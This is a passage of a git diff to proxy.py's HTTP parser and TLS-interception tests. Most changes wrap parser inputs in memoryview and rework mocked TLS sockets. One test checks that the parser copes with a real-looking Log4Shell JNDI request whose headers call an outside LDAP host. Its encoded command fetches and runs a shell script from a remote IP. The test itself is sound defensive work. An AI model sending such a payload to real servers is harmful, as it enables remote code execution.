httpParserStates.COMPLETE) def test_get_full_parse(self) -> None: @@ -236,7 +255,7 @@ def test_get_full_parse(self) -> None: b'https://example.com/path/dir/?a=b&c=d#p=q', b'example.com', ) - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) assert self.parser._url and self.parser._url.remainder self.assertEqual(self.parser._url.remainder, b'/path/dir/?a=b&c=d#p=q') @@ -262,7 +281,7 @@ def test_get_full_parse(self) -> None: def test_line_rcvd_to_rcving_headers_state_change(self) -> None: pkt = b'GET http://localhost HTTP/1.1' - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) self.assert_state_change_with_crlf( httpParserStates.INITIALIZED, @@ -274,7 +293,7 @@ def test_get_partial_parse1(self) -> None: pkt = CRLF.join([ b'GET http://localhost:8080 HTTP/1.1', ]) - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) self.assertEqual(self.parser.method, None) self.assertEqual(self.parser._url, None) @@ -284,7 +303,7 @@ def test_get_partial_parse1(self) -> None: httpParserStates.INITIALIZED, ) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.total_size, len(pkt) + len(CRLF)) self.assertEqual(self.parser.method, b'GET') assert self.parser._url @@ -294,7 +313,7 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) host_hdr = b'Host: localhost:8080' - self.parser.parse(host_hdr) + self.parser.parse(memoryview(host_hdr)) self.assertEqual( self.parser.total_size, len(pkt) + len(CRLF) + len(host_hdr), @@ -303,7 +322,7 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.buffer, b'Host: localhost:8080') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(CRLF * 2) + self.parser.parse(memoryview(CRLF * 2)) self.assertEqual( self.parser.total_size, len(pkt) + (3 * len(CRLF)) + len(host_hdr), @@ -320,10 +339,12 @@ def test_get_partial_parse1(self) -> None: def test_get_partial_parse2(self) -> None: self.parser.parse( - CRLF.join([ - b'GET http://localhost:8080 HTTP/1.1', - b'Host: ', - ]), + memoryview( + CRLF.join([ + b'GET http://localhost:8080 HTTP/1.1', + b'Host: ', + ]), + ), ) self.assertEqual(self.parser.method, b'GET') assert self.parser._url @@ -333,7 +354,7 @@ def test_get_partial_parse2(self) -> None: self.assertEqual(self.parser.buffer, b'Host: ') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(b'localhost:8080' + CRLF) + self.parser.parse(memoryview(b'localhost:8080' + CRLF)) assert self.parser.headers self.assertEqual( self.parser.headers[b'host'], @@ -342,14 +363,14 @@ def test_get_partial_parse2(self) -> None: b'localhost:8080', ), ) - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) self.assertEqual( self.parser.state, httpParserStates.RCVING_HEADERS, ) - self.parser.parse(b'Content-Type: text/plain' + CRLF) - self.assertEqual(self.parser.buffer, b'') + self.parser.parse(memoryview(b'Content-Type: text/plain' + CRLF)) + self.assertEqual(self.parser.buffer, None) assert self.parser.headers self.assertEqual( self.parser.headers[b'content-type'], ( @@ -362,7 +383,7 @@ def test_get_partial_parse2(self) -> None: httpParserStates.RCVING_HEADERS, ) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_post_full_parse(self) -> None: @@ -373,7 +394,7 @@ def test_post_full_parse(self) -> None: b'Content-Type: application/x-www-form-urlencoded' + CRLF, b'a=b&c=d', ]) - self.parser.parse(raw % b'http://localhost') + self.parser.parse(memoryview(raw % b'http://localhost')) self.assertEqual(self.parser.method, b'POST') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -389,7 +410,7 @@ def test_post_full_parse(self) -> None: (b'Content-Length', b'7'), ) self.assertEqual(self.parser.body, b'a=b&c=d') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(len(self.parser.build()), len(raw % b'/')) @@ -400,19 +421,21 @@ def assert_state_change_with_crlf( final_state: int, ) -> None: self.assertEqual(self.parser.state, initial_state) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, next_state) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, final_state) def test_post_partial_parse(self) -> None: self.parser.parse( - CRLF.join([ - b'POST http://localhost HTTP/1.1', - b'Host: localhost', - b'Content-Length: 7', - b'Content-Type: application/x-www-form-urlencoded', - ]), + memoryview( + CRLF.join([ + b'POST http://localhost HTTP/1.1', + b'Host: localhost', + b'Content-Length: 7', + b'Content-Type: application/x-www-form-urlencoded', + ]), + ), ) self.assertEqual(self.parser.method, b'POST') assert self.parser._url @@ -425,18 +448,18 @@ def test_post_partial_parse(self) -> None: httpParserStates.HEADERS_COMPLETE, ) - self.parser.parse(b'a=b') + self.parser.parse(memoryview(b'a=b')) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) self.assertEqual(self.parser.body, b'a=b') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) - self.parser.parse(b'&c=d') + self.parser.parse(memoryview(b'&c=d')) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(self.parser.body, b'a=b&c=d') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) def test_connect_request_without_host_header_request_parse(self) -> None: """Case where clients can send CONNECT request without a Host header field. @@ -449,7 +472,7 @@ def test_connect_request_without_host_header_request_parse(self) -> None: See https://github.com/abhinavsingh/py/issues/5 for details. """ - self.parser.parse(b'CONNECT pypi.org:443 HTTP/1.0\r\n\r\n') + self.parser.parse(memoryview(b'CONNECT pypi.org:443 HTTP/1.0\r\n\r\n')) self.assertEqual(self.parser.method, httpMethods.CONNECT) self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -464,12 +487,14 @@ def test_request_parse_without_content_length(self) -> None: See https://github.com/abhinavsingh/py/issues/20 for details. """ self.parser.parse( - CRLF.join([ - b'POST http://localhost HTTP/1.1', - b'Host: localhost', - b'Content-Type: application/x-www-form-urlencoded', - CRLF, - ]), + memoryview( + CRLF.join([ + b'POST http://localhost HTTP/1.1', + b'Host: localhost', + b'Content-Type: application/x-www-form-urlencoded', + CRLF, + ]), + ), ) self.assertEqual(self.parser.method, b'POST') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -490,16 +515,18 @@ def test_response_parse_without_content_length(self) -> None: pipelined responses not trigger stream close but may receive multiple responses. """ self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse(b'HTTP/1.0 200 OK' + CRLF) + self.parser.parse(memoryview(b'HTTP/1.0 200 OK' + CRLF)) self.assertEqual(self.parser.code, b'200') self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) self.parser.parse( - CRLF.join([ - b'Server: BaseHTTP/0.3 Python/2.7.10', - b'Date: Thu, 13 Dec 2018 16:24:09 GMT', - CRLF, - ]), + memoryview( + CRLF.join([ + b'Server: BaseHTTP/0.3 Python/2.7.10', + b'Date: Thu, 13 Dec 2018 16:24:09 GMT', + CRLF, + ]), + ), ) self.assertEqual( self.parser.state, @@ -509,22 +536,24 @@ def test_response_parse_without_content_length(self) -> None: def test_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER self.parser.parse( - b''.join([ - b'HTTP/1.1 301 Moved Permanently\r\n', - b'Location: http://www.google.com/\r\n', - b'Content-Type: text/html; charset=UTF-8\r\n', - b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', - b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', - b'Cache-Control: public, max-age=2592000\r\n', - b'Server: gws\r\n', - b'Content-Length: 219\r\n', - b'X-XSS-Protection: 1; mode=block\r\n', - b'X-Frame-Options: SAMEORIGIN\r\n\r\n', - b'\n' + - b'301 Moved', - b'\n

301 Moved

\nThe document has moved\n' + - b'here.\r\n\r\n', - ]), + memoryview( + b''.join([ + b'HTTP/1.1 301 Moved Permanently\r\n', + b'Location: http://www.google.com/\r\n', + b'Content-Type: text/html; charset=UTF-8\r\n', + b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', + b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', + b'Cache-Control: public, max-age=2592000\r\n', + b'Server: gws\r\n', + b'Content-Length: 219\r\n', + b'X-XSS-Protection: 1; mode=block\r\n', + b'X-Frame-Options: SAMEORIGIN\r\n\r\n', + b'\n' + + b'301 Moved', + b'\n

301 Moved

\nThe document has moved\n' + + b'here.\r\n\r\n', + ]), + ), ) self.assertEqual(self.parser.code, b'301') self.assertEqual(self.parser.reason, b'Moved Permanently') @@ -545,18 +574,20 @@ def test_response_parse(self) -> None: def test_response_partial_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER self.parser.parse( - b''.join([ - b'HTTP/1.1 301 Moved Permanently\r\n', - b'Location: http://www.google.com/\r\n', - b'Content-Type: text/html; charset=UTF-8\r\n', - b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', - b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', - b'Cache-Control: public, max-age=2592000\r\n', - b'Server: gws\r\n', - b'Content-Length: 219\r\n', - b'X-XSS-Protection: 1; mode=block\r\n', - b'X-Frame-Options: SAMEORIGIN\r\n', - ]), + memoryview( + b''.join([ + b'HTTP/1.1 301 Moved Permanently\r\n', + b'Location: http://www.google.com/\r\n', + b'Content-Type: text/html; charset=UTF-8\r\n', + b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', + b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', + b'Cache-Control: public, max-age=2592000\r\n', + b'Server: gws\r\n', + b'Content-Length: 219\r\n', + b'X-XSS-Protection: 1; mode=block\r\n', + b'X-Frame-Options: SAMEORIGIN\r\n', + ]), + ), ) assert self.parser.headers self.assertEqual( @@ -567,44 +598,50 @@ def test_response_partial_parse(self) -> None: self.parser.state, httpParserStates.RCVING_HEADERS, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(CRLF)) self.assertEqual( self.parser.state, httpParserStates.HEADERS_COMPLETE, ) self.parser.parse( - b'\n' + - b'301 Moved', + memoryview( + b'\n' + + b'301 Moved', + ), ) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) self.parser.parse( - b'\n

301 Moved

\nThe document has moved\n' + - b'here.\r\n\r\n', + memoryview( + b'\n

301 Moved

\nThe document has moved\n' + + b'here.\r\n\r\n', + ), ) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_chunked_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER self.parser.parse( - b''.join([ - b'HTTP/1.1 200 OK\r\n', - b'Content-Type: application/json\r\n', - b'Date: Wed, 22 May 2013 15:08:15 GMT\r\n', - b'Server: gunicorn/0.16.1\r\n', - b'transfer-encoding: chunked\r\n', - b'Connection: keep-alive\r\n\r\n', - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), + memoryview( + b''.join([ + b'HTTP/1.1 200 OK\r\n', + b'Content-Type: application/json\r\n', + b'Date: Wed, 22 May 2013 15:08:15 GMT\r\n', + b'Server: gunicorn/0.16.1\r\n', + b'transfer-encoding: chunked\r\n', + b'Connection: keep-alive\r\n\r\n', + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), ) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -633,28 +670,31 @@ def test_pipelined_chunked_response_parse(self) -> None: def assert_pipeline_response(self, response: memoryview) -> None: self.parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - self.parser.parse(response.tobytes() + response.tobytes()) + self.parser.parse(memoryview(response.tobytes() + response.tobytes())) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(self.parser.body, b'{"key":"value"}') self.assertEqual(self.parser.buffer, response) # parse buffer parser = HttpParser(httpParserTypes.RESPONSE_PARSER) + assert self.parser.buffer parser.parse(self.parser.buffer) self.assertEqual(parser.state, httpParserStates.COMPLETE) self.assertEqual(parser.body, b'{"key":"value"}') - self.assertEqual(parser.buffer, b'') + self.assertEqual(parser.buffer, None) def test_chunked_request_parse(self) -> None: self.parser.parse( - build_http_request( - httpMethods.POST, - b'http://example.org/', - headers={ - b'Transfer-Encoding': b'chunked', - b'Content-Type': b'application/json', - }, - body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', + memoryview( + build_http_request( + httpMethods.POST, + b'http://example.org/', + headers={ + b'Transfer-Encoding': b'chunked', + b'Content-Type': b'application/json', + }, + body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', + ), ), ) self.assertEqual(self.parser.body, b'{"key":"value"}') @@ -673,36 +713,44 @@ def test_chunked_request_parse(self) -> None: def test_is_http_1_1_keep_alive(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', + memoryview( + build_http_request( + httpMethods.GET, b'/', + ), ), ) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_http_1_1_keep_alive_with_non_close_connection_header(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', - headers={ - b'Connection': b'keep-alive', - }, + memoryview( + build_http_request( + httpMethods.GET, b'/', + headers={ + b'Connection': b'keep-alive', + }, + ), ), ) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_with_close_header(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', - conn_close=True, + memoryview( + build_http_request( + httpMethods.GET, b'/', + conn_close=True, + ), ), ) self.assertFalse(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_for_http_1_0(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', + memoryview( + build_http_request( + httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', + ), ), ) self.assertFalse(self.parser.is_http_1_1_keep_alive) @@ -713,7 +761,7 @@ def test_paramiko_doc(self) -> None: b'\r\nX-Cname-TryFiles: True\r\nX-Served: Nginx\r\nX-Deity: web02\r\nCF-Cache-Status: DYNAMIC' \ b'\r\nServer: cloudflare\r\nCF-RAY: 53f2208c6fef6c38-SJC\r\n\r\n' self.parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - self.parser.parse(response) + self.parser.parse(memoryview(response)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_request_factory(self) -> None: @@ -765,22 +813,24 @@ def test_proxy_protocol_not_for_response_parser(self) -> None: def test_is_safe_against_malicious_requests(self) -> None: self.parser.parse( - b'GET / HTTP/1.1\r\n' + - b'Host: 34.131.9.210:443\r\n' + - b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'Content-Type: application/x-www-form-urlencoded\r\n' + - b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' + - b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + - b'\r\n\r\n', + memoryview( + b'GET / HTTP/1.1\r\n' + + b'Host: 34.131.9.210:443\r\n' + + b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'Content-Type: application/x-www-form-urlencoded\r\n' + + b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' + + b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + + b'\r\n\r\n', + ), ) self.assertEqual( self.parser.header(b'user-agent'), @@ -814,20 +864,22 @@ def test_is_safe_against_malicious_requests(self) -> None: def test_parses_icap_protocol(self) -> None: # Ref https://datatracker.ietf.org/doc/html/rfc3507 self.parser.parse( - b'REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0\r\n' + - b'Host: icap-server.net\r\n' + - b'Encapsulated: req-hdr=0, req-body=154' + - b'\r\n\r\n' + - b'POST /origin-resource/form.pl HTTP/1.1\r\n' + - b'Host: www.origin-server.com\r\n' + - b'Accept: text/html, text/plain\r\n' + - b'Accept-Encoding: compress\r\n' + - b'Cache-Control: no-cache\r\n' + - b'\r\n' + - b'1e\r\n' + - b'I am posting this information.\r\n' + - b'0\r\n' + - b'\r\n', + memoryview( + b'REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0\r\n' + + b'Host: icap-server.net\r\n' + + b'Encapsulated: req-hdr=0, req-body=154' + + b'\r\n\r\n' + + b'POST /origin-resource/form.pl HTTP/1.1\r\n' + + b'Host: www.origin-server.com\r\n' + + b'Accept: text/html, text/plain\r\n' + + b'Accept-Encoding: compress\r\n' + + b'Cache-Control: no-cache\r\n' + + b'\r\n' + + b'1e\r\n' + + b'I am posting this information.\r\n' + + b'0\r\n' + + b'\r\n', + ), allowed_url_schemes=[b'icap'], ) self.assertEqual(self.parser.method, b'REQMOD') @@ -843,14 +895,16 @@ def test_cannot_parse_sip_protocol(self) -> None: # Our Url parser expects an integer port. with self.assertRaises(ValueError): self.parser.parse( - b'OPTIONS sip:nm SIP/2.0\r\n' + - b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + - b'From: ;tag=root\r\nTo: \r\n' + - b'Call-ID: 50000\r\n' + - b'CSeq: 42 OPTIONS\r\n' + - b'Max-Forwards: 70\r\n' + - b'Content-Length: 0\r\n' + - b'Contact: \r\n' + - b'Accept: application/sdp\r\n' + - b'\r\n', + memoryview( + b'OPTIONS sip:nm SIP/2.0\r\n' + + b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + + b'From: ;tag=root\r\nTo: \r\n' + + b'Call-ID: 50000\r\n' + + b'CSeq: 42 OPTIONS\r\n' + + b'Max-Forwards: 70\r\n' + + b'Content-Length: 0\r\n' + + b'Contact: \r\n' + + b'Accept: application/sdp\r\n' + + b'\r\n', + ), ) diff --git a/tests/http/proxy/test_http_proxy_tls_interception.py b/tests/http/proxy/test_http_proxy_tls_interception.py index e7e166f372..b3734ca23f 100644 --- a/tests/http/proxy/test_http_proxy_tls_interception.py +++ b/tests/http/proxy/test_http_proxy_tls_interception.py @@ -12,7 +12,7 @@ import uuid import socket import selectors -from typing import Any +from typing import Any, TypeVar import pytest from unittest import mock @@ -22,7 +22,10 @@ from proxy.http import HttpProtocolHandler, HttpClientConnection, httpMethods from proxy.http.proxy import HttpProxyPlugin from proxy.common.flag import FlagParser -from proxy.common.utils import bytes_, build_http_request +from proxy.http.parser import HttpParser +from proxy.common.utils import ( + bytes_, build_http_request, tls_interception_enabled, +) from proxy.http.responses import PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT from proxy.core.connection import TcpServerConnection from proxy.common.constants import DEFAULT_CA_FILE @@ -46,32 +49,39 @@ async def test_e2e(self, mocker: MockerFixture) -> None: self.mock_server_conn = mocker.patch( 'proxy.http.proxy.server.TcpServerConnection', ) - self.mock_ssl_context = mocker.patch('ssl.create_default_context') - self.mock_ssl_wrap = mocker.patch('ssl.wrap_socket') - self.mock_sign_csr.return_value = True self.mock_gen_csr.return_value = True self.mock_gen_public_key.return_value = True - ssl_connection = mock.MagicMock(spec=ssl.SSLSocket) - self.mock_ssl_context.return_value.wrap_socket.return_value = ssl_connection - self.mock_ssl_wrap.return_value = mock.MagicMock(spec=ssl.SSLSocket) + # Used for server side wrapping + self.mock_ssl_context = mocker.patch('ssl.create_default_context') + upstream_tls_sock = mock.MagicMock(spec=ssl.SSLSocket) + self.mock_ssl_context.return_value.wrap_socket.return_value = upstream_tls_sock + + # Used for client wrapping + self.mock_ssl_wrap = mocker.patch('ssl.wrap_socket') + client_tls_sock = mock.MagicMock(spec=ssl.SSLSocket) + self.mock_ssl_wrap.return_value = client_tls_sock + plain_connection = mock.MagicMock(spec=socket.socket) def mock_connection() -> Any: if self.mock_ssl_context.return_value.wrap_socket.called: - return ssl_connection + return upstream_tls_sock return plain_connection # Do not mock the original wrap method self.mock_server_conn.return_value.wrap.side_effect = \ - lambda x, y: TcpServerConnection.wrap( - self.mock_server_conn.return_value, x, y, + lambda x, y, as_non_blocking: TcpServerConnection.wrap( + self.mock_server_conn.return_value, x, y, as_non_blocking=as_non_blocking, ) type(self.mock_server_conn.return_value).connection = \ mock.PropertyMock(side_effect=mock_connection) + type(self.mock_server_conn.return_value).closed = \ + mock.PropertyMock(return_value=False) + self.fileno = 10 self._addr = ('127.0.0.1', 54382) self.flags = FlagParser.initialize( @@ -80,6 +90,11 @@ def mock_connection() -> Any: ca_signing_key_file='ca-signing-key.pem', threaded=True, ) + self.assertTrue(tls_interception_enabled(self.flags)) + # In this test we enable a mock http protocol handler plugin + # and a mock http proxy plugin. Internally, http protocol + # handler will only initialize proxy plugin as we'll never + # make any other request. self.plugin = mock.MagicMock() self.proxy_plugin = mock.MagicMock() self.flags.plugins = { @@ -96,36 +111,52 @@ def mock_connection() -> Any: self.plugin.assert_not_called() self.proxy_plugin.assert_not_called() + # Mock a CONNECT request followed by a GET request + # from client connection + headers = { + b'Host': bytes_(netloc), + } connect_request = build_http_request( httpMethods.CONNECT, bytes_(netloc), - headers={ - b'Host': bytes_(netloc), - }, + headers=headers, + no_ua=True, ) self._conn.recv.return_value = connect_request + get_request = build_http_request( + httpMethods.GET, b'/', + headers=headers, + ) + client_tls_sock.recv.return_value = get_request - async def asyncReturnBool(val: bool) -> bool: - return val + T = TypeVar('T') # noqa: N806 - # Prepare mocked HttpProtocolHandlerPlugin - # self.plugin.return_value.get_descriptors.return_value = ([], []) - # self.plugin.return_value.write_to_descriptors.return_value = asyncReturnBool(False) - # self.plugin.return_value.read_from_descriptors.return_value = asyncReturnBool(False) - # self.plugin.return_value.on_client_data.side_effect = lambda raw: raw - # self.plugin.return_value.on_request_complete.return_value = False - # self.plugin.return_value.on_response_chunk.side_effect = lambda chunk: chunk - # self.plugin.return_value.on_client_connection_close.return_value = None + async def asyncReturn(val: T) -> T: + return val # Prepare mocked HttpProxyBasePlugin - self.proxy_plugin.return_value.write_to_descriptors.return_value = \ - asyncReturnBool(False) - self.proxy_plugin.return_value.read_from_descriptors.return_value = \ - asyncReturnBool(False) + # 1. Mock descriptor mixin methods + # + # NOTE: We need multiple async result otherwise + # we will end up with cannot await on already + # awaited coroutine. + self.proxy_plugin.return_value.get_descriptors.side_effect = \ + [asyncReturn(([], [])), asyncReturn(([], []))] + self.proxy_plugin.return_value.write_to_descriptors.side_effect = \ + [asyncReturn(False), asyncReturn(False)] + self.proxy_plugin.return_value.read_from_descriptors.side_effect = \ + [asyncReturn(False), asyncReturn(False)] + # 2. Mock plugin lifecycle methods + self.proxy_plugin.return_value.resolve_dns.return_value = None, None self.proxy_plugin.return_value.before_upstream_connection.side_effect = lambda r: r + self.proxy_plugin.return_value.handle_client_data.side_effect = lambda r: r self.proxy_plugin.return_value.handle_client_request.side_effect = lambda r: r - self.proxy_plugin.return_value.resolve_dns.return_value = None, None + self.proxy_plugin.return_value.handle_upstream_chunk.side_effect = lambda r: r + self.proxy_plugin.return_value.on_upstream_connection_close.return_value = None + self.proxy_plugin.return_value.on_access_log.side_effect = lambda r: r + self.proxy_plugin.return_value.do_intercept.return_value = True self.mock_selector.return_value.select.side_effect = [ + # Trigger read on plain socket [( selectors.SelectorKey( fileobj=self._conn.fileno(), @@ -135,6 +166,16 @@ async def asyncReturnBool(val: bool) -> bool: ), selectors.EVENT_READ, )], + # Trigger read on encrypted socket + [( + selectors.SelectorKey( + fileobj=client_tls_sock.fileno(), + fd=client_tls_sock.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], ] await self.protocol_handler._run_once() @@ -150,20 +191,38 @@ async def asyncReturnBool(val: bool) -> bool: # for interception self.assertEqual( self.proxy_plugin.call_args[0][2].connection, - self.mock_ssl_wrap.return_value, - ) - - # Assert our mocked plugins invocations - # self.plugin.return_value.get_descriptors.assert_called() - # self.plugin.return_value.write_to_descriptors.assert_called_with([]) - # # on_client_data is only called after initial request has completed - # self.plugin.return_value.on_client_data.assert_not_called() - # self.plugin.return_value.on_request_complete.assert_called() - # self.plugin.return_value.read_from_descriptors.assert_called_with([ - # self._conn.fileno(), - # ]) + client_tls_sock, + ) + + # Invoked lifecycle callbacks + self.proxy_plugin.return_value.resolve_dns.assert_called_once_with( + host, port, + ) self.proxy_plugin.return_value.before_upstream_connection.assert_called() - self.proxy_plugin.return_value.handle_client_request.assert_called() + self.proxy_plugin.return_value.handle_client_request.assert_called_once() + self.proxy_plugin.return_value.do_intercept.assert_called_once() + # All the invoked lifecycle callbacks will receive the CONNECT request + # packet with / as the path + callback_request: HttpParser = \ + self.proxy_plugin.return_value.before_upstream_connection.call_args_list[0][0][0] + callback_request1: HttpParser = \ + self.proxy_plugin.return_value.handle_client_request.call_args_list[0][0][0] + callback_request2: HttpParser = \ + self.proxy_plugin.return_value.do_intercept.call_args_list[0][0][0] + self.assertEqual(callback_request.host, bytes_(host)) + self.assertEqual(callback_request.port, 443) + self.assertEqual(callback_request.header(b'Host'), headers[b'Host']) + assert callback_request._url + self.assertEqual(callback_request._url.remainder, None) + self.assertEqual(callback_request.method, httpMethods.CONNECT) + self.assertEqual(callback_request.is_https_tunnel, True) + self.assertEqual(callback_request.build(), callback_request1.build()) + self.assertEqual(callback_request.build(), callback_request2.build()) + # Lifecycle callbacks not invoked + self.proxy_plugin.return_value.handle_client_data.assert_not_called() + self.proxy_plugin.return_value.handle_upstream_chunk.assert_not_called() + self.proxy_plugin.return_value.on_upstream_connection_close.assert_not_called() + self.proxy_plugin.return_value.on_access_log.assert_not_called() self.mock_server_conn.assert_called_with(host, port) self.mock_server_conn.return_value.connection.setblocking.assert_called_with( @@ -173,9 +232,6 @@ async def asyncReturnBool(val: bool) -> bool: self.mock_ssl_context.assert_called_with( ssl.Purpose.SERVER_AUTH, cafile=str(DEFAULT_CA_FILE), ) - # self.assertEqual(self.mock_ssl_context.return_value.options, - # ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | - # ssl.OP_NO_TLSv1_1) self.assertEqual(plain_connection.setblocking.call_count, 2) self.mock_ssl_context.return_value.wrap_socket.assert_called_with( plain_connection, server_hostname=host, @@ -183,10 +239,10 @@ async def asyncReturnBool(val: bool) -> bool: self.assertEqual(self.mock_sign_csr.call_count, 1) self.assertEqual(self.mock_gen_csr.call_count, 1) self.assertEqual(self.mock_gen_public_key.call_count, 1) - self.assertEqual(ssl_connection.setblocking.call_count, 1) + self.assertEqual(upstream_tls_sock.setblocking.call_count, 1) self.assertEqual( self.mock_server_conn.return_value._conn, - ssl_connection, + upstream_tls_sock, ) self._conn.send.assert_called_with( PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT, @@ -204,15 +260,42 @@ async def asyncReturnBool(val: bool) -> bool: self.assertEqual(self._conn.setblocking.call_count, 